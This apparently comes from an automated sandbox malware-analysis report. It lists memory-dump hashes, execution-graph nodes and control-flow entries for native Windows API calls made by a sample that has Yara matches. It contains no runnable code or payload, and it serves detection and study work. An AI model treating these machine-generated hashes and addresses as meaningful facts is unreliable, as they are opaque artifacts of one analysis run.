                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133325507.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69c0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 51063e3f737101872e8866ddd6267bc0a6cbf406dc7ef60489a82853128807c2
                                          • Instruction ID: e7c9ba5cb9c0c52535cfc85423ee3bbe82cf4c6263c473c721ab66020c77a967
                                          • Opcode Fuzzy Hash: 51063e3f737101872e8866ddd6267bc0a6cbf406dc7ef60489a82853128807c2
                                          • Instruction Fuzzy Hash: A7A16A70A04608CFEB84DFA8D448BAEBBF2FB89311F105129D509A7759DB38AD45CF61
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133325507.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69c0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 27093d347c0ebf5df0ebcda2c8e920063e53f854af810d618dac57740731c853
                                          • Instruction ID: ed24d6fc9056c7ae4cd0b7f3159872f0dec09b11eab13ea469a636b6cd8e4ffe
                                          • Opcode Fuzzy Hash: 27093d347c0ebf5df0ebcda2c8e920063e53f854af810d618dac57740731c853
                                          • Instruction Fuzzy Hash: B6A15A70A04208CFEB84DFA8D4487AEBBF2FB89310F105129D509A7799DB38AD45CF61
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133325507.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69c0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 163f1dc9f39c4f358cf525b2cee835f78f500d5f73c3c0d659563b5285a60213
                                          • Instruction ID: 16392e9f4f0ce45482d2a8eac8771ce7dba5c2a6f272497d896f5a1f5bab2c01
                                          • Opcode Fuzzy Hash: 163f1dc9f39c4f358cf525b2cee835f78f500d5f73c3c0d659563b5285a60213
                                          • Instruction Fuzzy Hash: 1DA14E70E04208DFEB94EFA8D444B9EBBB2FB89310F509069D109A7759DB34AD85CF61
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2134217178.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6e30000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 44234df88d9feb62f2f86254d6dbe3b68dcd4f3ca06d2bc4809ddd9b2f8c7e96
                                          • Instruction ID: 1f29ca496990ec9aa0c9fdd9dcddcd891dd82e093009133e2dffa4e590f763cf
                                          • Opcode Fuzzy Hash: 44234df88d9feb62f2f86254d6dbe3b68dcd4f3ca06d2bc4809ddd9b2f8c7e96
                                          • Instruction Fuzzy Hash: 68A10370D01328CFEBA4EFB9D844BADBBB2BF48304F11A0A9D109A7255EB745985CF44
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133325507.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69c0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9ca2ec20d0c217612575c2ce5d3032464fb7073151aca8ac1cbfb4122fc9bda9
                                          • Instruction ID: b463bfb25eb6ef468ca7dc91a96780ef5637aa9248d59819ab62482f7ba2c57e
                                          • Opcode Fuzzy Hash: 9ca2ec20d0c217612575c2ce5d3032464fb7073151aca8ac1cbfb4122fc9bda9
                                          • Instruction Fuzzy Hash: 69A15E30E04218DFEB94EFA8D444B9EBBB2FB89310F509069D109A7759DB34AD85CF61
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133325507.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69c0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5c87df32978811babb6c2f226a9dd71892e70ab911e71ed294227c6ea5ce1a43
                                          • Instruction ID: 27be9e7dc883d895e81ef99946f0f170fb1ee090f07ad071d0d4f5e80f5416e3
                                          • Opcode Fuzzy Hash: 5c87df32978811babb6c2f226a9dd71892e70ab911e71ed294227c6ea5ce1a43
                                          • Instruction Fuzzy Hash: ADA16F30E04218DFEB94EFA8D444B9EBBB2FB89310F509069D109A7759DB34AD85CF61
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133271608.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69a0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 83fc5c1d5b6f3859239d465ebe535cb1b9a0820296ece3e8c575081da9086022
                                          • Instruction ID: 138a8b0ab70dfceb4a77e61fae4cad4668e35b4b63ed72c53948142b54234d5f
                                          • Opcode Fuzzy Hash: 83fc5c1d5b6f3859239d465ebe535cb1b9a0820296ece3e8c575081da9086022
                                          • Instruction Fuzzy Hash: A9913774E04208CFEB94DFA9D544BAEBBF2FB89300F109069D419A7655DB34AD85CF90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133271608.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69a0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 151d61cc88b81ff770134f6ebc80112c80ec2966f0903bacfcfd5e6d9f7e48d4
                                          • Instruction ID: cdc9fbe394c7cf421510fb71f9eccc09d9aeb696f56715be78f06458f8b1be03
                                          • Opcode Fuzzy Hash: 151d61cc88b81ff770134f6ebc80112c80ec2966f0903bacfcfd5e6d9f7e48d4
                                          • Instruction Fuzzy Hash: 0D91F674E04208CFEB94DFA9D584BAEBBF2FB89300F109069D519A7655DB34AD81CF90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 154df93e7b693199ce8aa60cb0a56dc93812fe4bcca003c875831f9e4d1ff2af
                                          • Instruction ID: 3521408ab7c95fc20d40b56642fecea2ddf1c0dd69bf5c7d08a6efa9eff1e919
                                          • Opcode Fuzzy Hash: 154df93e7b693199ce8aa60cb0a56dc93812fe4bcca003c875831f9e4d1ff2af
                                          • Instruction Fuzzy Hash: 5A613970E11218DFEB64CF6AD884BEDBBF2BF85310F1480A9D408A7695DB705A80CF60
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c48366c940c4d15dc684d25ec6e298f7d2bbe65fb3c5a0723e8100710aad6d80
                                          • Instruction ID: 05e249da1ae798d78a7d8beb258c353019428f5d3f5e8096ac67692b22ab7792
                                          • Opcode Fuzzy Hash: c48366c940c4d15dc684d25ec6e298f7d2bbe65fb3c5a0723e8100710aad6d80
                                          • Instruction Fuzzy Hash: 71612770E15218DFEB64CF6ED980BA9BBF6BF89300F1484A9D408A7655DB705E80CF60
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133271608.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69a0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b7fd83aa153d5e6b135ec9b31cad3b83d4f848acbb01326f390dcb71175619b9
                                          • Instruction ID: 55ddf9bff9b29acd859387ad97125ffebc18b1ca92222a051a23e116a73118e5
                                          • Opcode Fuzzy Hash: b7fd83aa153d5e6b135ec9b31cad3b83d4f848acbb01326f390dcb71175619b9
                                          • Instruction Fuzzy Hash: 89513470D06328CFEB54DFA9D444BAEBBF2FB89304F249029D409A7654D734AA46CF90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133271608.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69a0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cc4820a1eb8564eae400ec9325119451a4c517349c40390c9daa9f73c9eefeb8
                                          • Instruction ID: 0ebd707d8d712c919b16b40a6b9623a1ecf79b33d9261a5ebade86f99a2936d2
                                          • Opcode Fuzzy Hash: cc4820a1eb8564eae400ec9325119451a4c517349c40390c9daa9f73c9eefeb8
                                          • Instruction Fuzzy Hash: 2E513370D06328CFEB84DFA9D4547ADBBF6FB89304F249029D009A7654D734AA46CF80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d254ff2208bfb902cf28890da02279fbadd2e76f2cbda908876a92f7287f5b57
                                          • Instruction ID: 2cb2582d60aee06d416b62f94b3d3fc9cace41f2aaefaae606fc9c8b8f0b023b
                                          • Opcode Fuzzy Hash: d254ff2208bfb902cf28890da02279fbadd2e76f2cbda908876a92f7287f5b57
                                          • Instruction Fuzzy Hash: 5A4167B1E016199BDB18CFABD94059EFBF3AFC8310F14C07AD958AB264DB3059468F54
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133271608.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69a0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7ebadc0b238552dc6b720bc7e2d942d16db86358285d59b136e3d2788493942d
                                          • Instruction ID: 88ae19785e9e213993ff28dc6e85dcf22c141e12c30f7d5bcabd8612fde2ed10
                                          • Opcode Fuzzy Hash: 7ebadc0b238552dc6b720bc7e2d942d16db86358285d59b136e3d2788493942d
                                          • Instruction Fuzzy Hash: 3A41D2B0E05218CFEB58CFAAD944BDDBBF6BB89300F14C1AAD409A7254DB741985CF90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133271608.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69a0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 60358e812f5c9c4b95e8e97a03e30c53cd47fd99857bde8d3c6311a92deac3b6
                                          • Instruction ID: d03ea251a3a30040917950c00d216b62bc517709711520b3db9f92277ce39f1d
                                          • Opcode Fuzzy Hash: 60358e812f5c9c4b95e8e97a03e30c53cd47fd99857bde8d3c6311a92deac3b6
                                          • Instruction Fuzzy Hash: F0315270D152188FDB94DFA9D9407ADBBF2FF89301F10A069C509A3644DB305D81CF80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133271608.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69a0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 07c96909db6aa24fa460fdc3fa462d4725a0173d1390292e69da26a8fa9f0d8d
                                          • Instruction ID: cf0c529803532040170e066989e3c53c5c6d7ec4e6b43a1c53f5fdf19c385afa
                                          • Opcode Fuzzy Hash: 07c96909db6aa24fa460fdc3fa462d4725a0173d1390292e69da26a8fa9f0d8d
                                          • Instruction Fuzzy Hash: C73106B0E05618CBEB58CFAAD8447DDBBF2BF88300F18C06AD409A7254DB741986CF90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133358737.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69d0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 12274ed1826a2903fa2207a41fded9f7fe9f500187db46b975d925a3cca0c7dd
                                          • Instruction ID: 11aeb88791f3854dc87e3026c5a60b6e0a4af2818ab8034c021089a7c9bdafbb
                                          • Opcode Fuzzy Hash: 12274ed1826a2903fa2207a41fded9f7fe9f500187db46b975d925a3cca0c7dd
                                          • Instruction Fuzzy Hash: AD41E570D057588FEB69CF6BC80578AFBF6AF86304F08C1AAC448AB265DB740945CF51
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b9919ca010aeddba56ecbb8c61f45e7d84c73b099064db20507cbd49d270c7fa
                                          • Instruction ID: ff1e24d406b9acfd9e34660d6af76739caf15528e16109522b2a3a3e0fcc426a
                                          • Opcode Fuzzy Hash: b9919ca010aeddba56ecbb8c61f45e7d84c73b099064db20507cbd49d270c7fa
                                          • Instruction Fuzzy Hash: 53314971E05618DFDB88CF6AE84079ABBF7BF89300F04C1AAC408A7668DB341941CF51
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133358737.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69d0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9eb86ef218b5534fce48d0159bfcfce2caed37fe6a86c3f413d95aa999c7f806
                                          • Instruction ID: 381799d07b22bdacec564b385cd0739cf9be6b4125117828e134d3a4f1f4c727
                                          • Opcode Fuzzy Hash: 9eb86ef218b5534fce48d0159bfcfce2caed37fe6a86c3f413d95aa999c7f806
                                          • Instruction Fuzzy Hash: 1D3154B1D01628CBEB68CF6BC95978AFAF6BF89304F14C1A9C40CA7254DB740A85CF51
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133358737.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69d0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8cc8d4562732b9aaf1828585e7578c7d0104949c5dada39faf9d2e1811328433
                                          • Instruction ID: 8a2441a57fde4ca4cbd1dc12273ac896cd4e8f6553caf24b6a9e532bccbabb98
                                          • Opcode Fuzzy Hash: 8cc8d4562732b9aaf1828585e7578c7d0104949c5dada39faf9d2e1811328433
                                          • Instruction Fuzzy Hash: 6C31D7B1E056188FEB58CF6BC8442DABBF7ABC9300F14C0BAD909A7619DB305D858F50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133358737.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69d0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: aedd52c8da7f13921223d53cf048281e82ec079934cba6d02e3bf320c93a5136
                                          • Instruction ID: f45af64075e9ce8886d6efeb54b360f2aa43fac818875942843e7c0d706c5283
                                          • Opcode Fuzzy Hash: aedd52c8da7f13921223d53cf048281e82ec079934cba6d02e3bf320c93a5136
                                          • Instruction Fuzzy Hash: D321CCB1E056589BEB59CF6BCC006DAFAF7AFC9310F14C4BAD848AB215DB7009858F51
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ca0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (nq$4'jq$4'jq$4'jq$4'jq$pnq
                                          • API String ID: 0-2343140522
                                          • Opcode ID: e9a8f4b1d6a8ef9ae9c0f989f2b984649f5e7af2ff2f267fa89fe93352ccec52
                                          • Instruction ID: 91e2e25084a8ff86f33f905dd66a5d3d36df7bb730a0ded7eeb2fe28dfa4b772
                                          • Opcode Fuzzy Hash: e9a8f4b1d6a8ef9ae9c0f989f2b984649f5e7af2ff2f267fa89fe93352ccec52
                                          • Instruction Fuzzy Hash: 2951A370A403058FC748DF698950AAFBBEBFFC8300F14496CD44A976A9DE789906C7A1

                                          Execution Graph

                                          Execution Coverage:0.8%
                                          Dynamic/Decrypted Code Coverage:5.1%
                                          Signature Coverage:4.1%
                                          Total number of Nodes:98
                                          Total number of Limit Nodes:8
                                          execution_graph 91855 42fa43 91856 42f9b3 91855->91856 91858 42fa10 91856->91858 91861 42e953 91856->91861 91859 42f9ed 91864 42e873 91859->91864 91867 42cad3 91861->91867 91863 42e96e 91863->91859 91870 42cb23 91864->91870 91866 42e88c 91866->91858 91868 42caed 91867->91868 91869 42cafe RtlAllocateHeap 91868->91869 91869->91863 91871 42cb3d 91870->91871 91872 42cb4e RtlFreeHeap 91871->91872 91872->91866 91873 42bd63 91874 42bd7d 91873->91874 91877 1692df0 LdrInitializeThunk 91874->91877 91875 42bda5 91877->91875 91878 424b63 91879 424b7f 91878->91879 91880 424ba7 91879->91880 91881 424bbb 91879->91881 91883 42c7a3 NtClose 91880->91883 91888 42c7a3 91881->91888 91885 424bb0 91883->91885 91884 424bc4 91891 42e993 RtlAllocateHeap 91884->91891 91887 424bcf 91889 42c7bd 91888->91889 91890 42c7ce NtClose 91889->91890 91890->91884 91891->91887 91959 424ef3 91960 424f0c 91959->91960 91961 424f57 91960->91961 91964 424f94 91960->91964 91966 424f99 91960->91966 91962 42e873 RtlFreeHeap 91961->91962 91963 424f64 91962->91963 91965 42e873 RtlFreeHeap 91964->91965 91965->91966 91967 42f913 91968 42f923 91967->91968 91969 42f929 91967->91969 91970 42e953 RtlAllocateHeap 91969->91970 91971 42f94f 91970->91971 91892 401b82 91893 401b87 91892->91893 91896 42fde3 91893->91896 91899 42e423 91896->91899 91900 42e449 91899->91900 91909 407523 91900->91909 91902 42e45f 91903 401c1c 91902->91903 91912 41b2b3 91902->91912 91905 42e47e 91906 42e493 91905->91906 91907 42cb73 ExitProcess 91905->91907 91923 42cb73 91906->91923 91907->91906 91926 4166a3 91909->91926 91911 407530 91911->91902 91913 41b2df 91912->91913 91944 41b1a3 91913->91944 91916 41b324 91918 41b340 91916->91918 91921 42c7a3 NtClose 91916->91921 91917 41b30c 91919 41b317 91917->91919 91920 42c7a3 NtClose 91917->91920 91918->91905 91919->91905 91920->91919 91922 41b336 91921->91922 91922->91905 91924 42cb90 91923->91924 91925 42cba1 ExitProcess 91924->91925 91925->91903 91927 4166bd 91926->91927 91929 4166d6 91927->91929 91930 42d223 91927->91930 91929->91911 91931 42d23d 91930->91931 91932 42d26c 91931->91932 91937 42bdb3 91931->91937 91932->91929 91935 42e873 RtlFreeHeap 91936 42d2e5 91935->91936 91936->91929 91938 42bdcd 91937->91938 91941 1692c0a 91938->91941 91939 42bdf9 91939->91935 91942 1692c1f LdrInitializeThunk 91941->91942 91943 1692c11 91941->91943 91942->91939 91943->91939 91945 41b1bd 91944->91945 91949 41b299 91944->91949 91950 42be53 91945->91950 91948 42c7a3 NtClose 91948->91949 91949->91916 91949->91917 91951 42be6d 91950->91951 91954 16935c0 LdrInitializeThunk 91951->91954 91952 41b28d 91952->91948 91954->91952 91955 417983 91956 4179a7 91955->91956 91957 4179e3 LdrLoadDll 91956->91957 91958 4179ae 91956->91958 91957->91958 91977 413ef3 91980 413f10 91977->91980 91979 413f6c 91981 413f76 91980->91981 91982 41b5c3 RtlFreeHeap LdrInitializeThunk 91980->91982 91982->91979

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 32 417983-41799f 33 4179a7-4179ac 32->33 34 4179a2 call 42f453 32->34 35 4179b2-4179c0 call 42fa53 33->35 36 4179ae-4179b1 33->36 34->33 39 4179d0-4179e1 call 42def3 35->39 40 4179c2-4179cd call 42fcf3 35->40 45 4179e3-4179f5 LdrLoadDll 39->45 46 4179fa-4179fd 39->46 40->39 47 4179f7 45->47 47->46
                                          APIs
                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004179F5
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2216787886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Load
                                          • String ID:
                                          • API String ID: 2234796835-0
                                          • Opcode ID: 919664c6ec93289ae22f137e9bf50d951b2176283fe432a251c119e73e98b3ef
                                          • Instruction ID: 2272e45357e1b8a5eef0063927663549135e1288739789d900d719aea6b3099d
                                          • Opcode Fuzzy Hash: 919664c6ec93289ae22f137e9bf50d951b2176283fe432a251c119e73e98b3ef
                                          • Instruction Fuzzy Hash: C00112B5E0020DABDB10DAA5DC42FDEB778AB54308F4081A6E90897240F675EB588795

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 53 42c7a3-42c7dc call 4048f3 call 42da03 NtClose
                                          APIs
                                          • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C7D7
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2216787886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: 36e5aa6e06a6865421a501a8efbc971ace10677f283fac51b5c3a6700c8166c7
                                          • Instruction ID: c068b07e7c5f5f25d136ae17d6bddc0cdf0b8edc256bca3c504a9b7e04cf088e
                                          • Opcode Fuzzy Hash: 36e5aa6e06a6865421a501a8efbc971ace10677f283fac51b5c3a6700c8166c7
                                          • Instruction Fuzzy Hash: 11E046762042147BE620AA6ADC41F9B776CEFC5714F00842AFA08A7241CA76B91187F8

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 68 1692df0-1692dfc LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 8dd68a9e39134abd33ab31852eeb5a0f144e06eb4c16f7512475d778b7902560
                                          • Instruction ID: 21782efff9a5183e87e5f056ab0087e052e6e5fd5f6bedf6b81b7efc031ce11d
                                          • Opcode Fuzzy Hash: 8dd68a9e39134abd33ab31852eeb5a0f144e06eb4c16f7512475d778b7902560
                                          • Instruction Fuzzy Hash: 7590027170140413D11175984914707000D97D0242FD5C412A5424658ED6569E52A621

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 67 1692c70-1692c7c LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 43b2a0559a1f6807a596841c753d872f1d57ddd85b8fd5661f5b039dba9459bd
                                          • Instruction ID: 8d0f988ae4a04fa16ed1e43cf415b136ce9e09d5875d63d5051eaa700a1fa74a
                                          • Opcode Fuzzy Hash: 43b2a0559a1f6807a596841c753d872f1d57ddd85b8fd5661f5b039dba9459bd
                                          • Instruction Fuzzy Hash: D990027170148802D1107598881474B000997D0302F99C411A9424758EC6959D917621

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 69 16935c0-16935cc LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 1c45e03ae6aaaf880426e440f477eb848f75d75fb9b2db9cf201bdd3a296fce4
                                          • Instruction ID: 26a2ef05ec1ab60b96ad5a761f4093c9d1582f48c4240a6bffea95fce522a3bc
                                          • Opcode Fuzzy Hash: 1c45e03ae6aaaf880426e440f477eb848f75d75fb9b2db9cf201bdd3a296fce4
                                          • Instruction Fuzzy Hash: 6B900271B0550402D10075984924707100997D0202FA5C411A5424668EC7959E516AA2

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 42cb23-42cb64 call 4048f3 call 42da03 RtlFreeHeap
                                          APIs
                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CB5F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2216787886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID: 1gA
                                          • API String ID: 3298025750-4052736723
                                          • Opcode ID: 0b9c64c89bd8e8e46414c8097e5b75ef52ce40fc719733ff23b7b54767d60661
                                          • Instruction ID: 3db9d38b6c099dfd2cf4dce0f204b55713b22ea5661551a61eb9de621a3d7ce5
                                          • Opcode Fuzzy Hash: 0b9c64c89bd8e8e46414c8097e5b75ef52ce40fc719733ff23b7b54767d60661
                                          • Instruction Fuzzy Hash: CFE09276208604BBD610EE99DC45FDB37ADEFC9714F004419FA08A7241D671B91187B4

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 48 42cad3-42cb14 call 4048f3 call 42da03 RtlAllocateHeap
                                          APIs
                                          • RtlAllocateHeap.NTDLL(?,0041E73B,?,?,00000000,?,0041E73B,?,?,?), ref: 0042CB0F
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2216787886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 5f4595f409b0a238fc68096f1e2163fd5f9118da07220293d69c765325efb063
                                          • Instruction ID: 1cc8bddffe364a191cc507c297a67581dd259309c4f7cb3357891730a1f7528c
                                          • Opcode Fuzzy Hash: 5f4595f409b0a238fc68096f1e2163fd5f9118da07220293d69c765325efb063
                                          • Instruction Fuzzy Hash: EDE092B6608244BBD610EFA9EC41FDB33ACEFC5714F004419F908A7241CA71B9118BB4

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 58 42cb73-42cbaf call 4048f3 call 42da03 ExitProcess
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2216787886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID:
                                          • API String ID: 621844428-0
                                          • Opcode ID: d8368835974c325c49e4badbc378e576f0341e2ec1d321e659ceb712fa60f3df
                                          • Instruction ID: b8e24616ca6c070d3f9d53c64f91f6f12713fa84a05849ca7b521decef18237f
                                          • Opcode Fuzzy Hash: d8368835974c325c49e4badbc378e576f0341e2ec1d321e659ceb712fa60f3df
                                          • Instruction Fuzzy Hash: E2E046362043547BD220BA5ADC02F9BB7ACDFC5714F00442AFA08A7241CBB2B91087B4

                                          Control-flow Graph

                                          • Executed
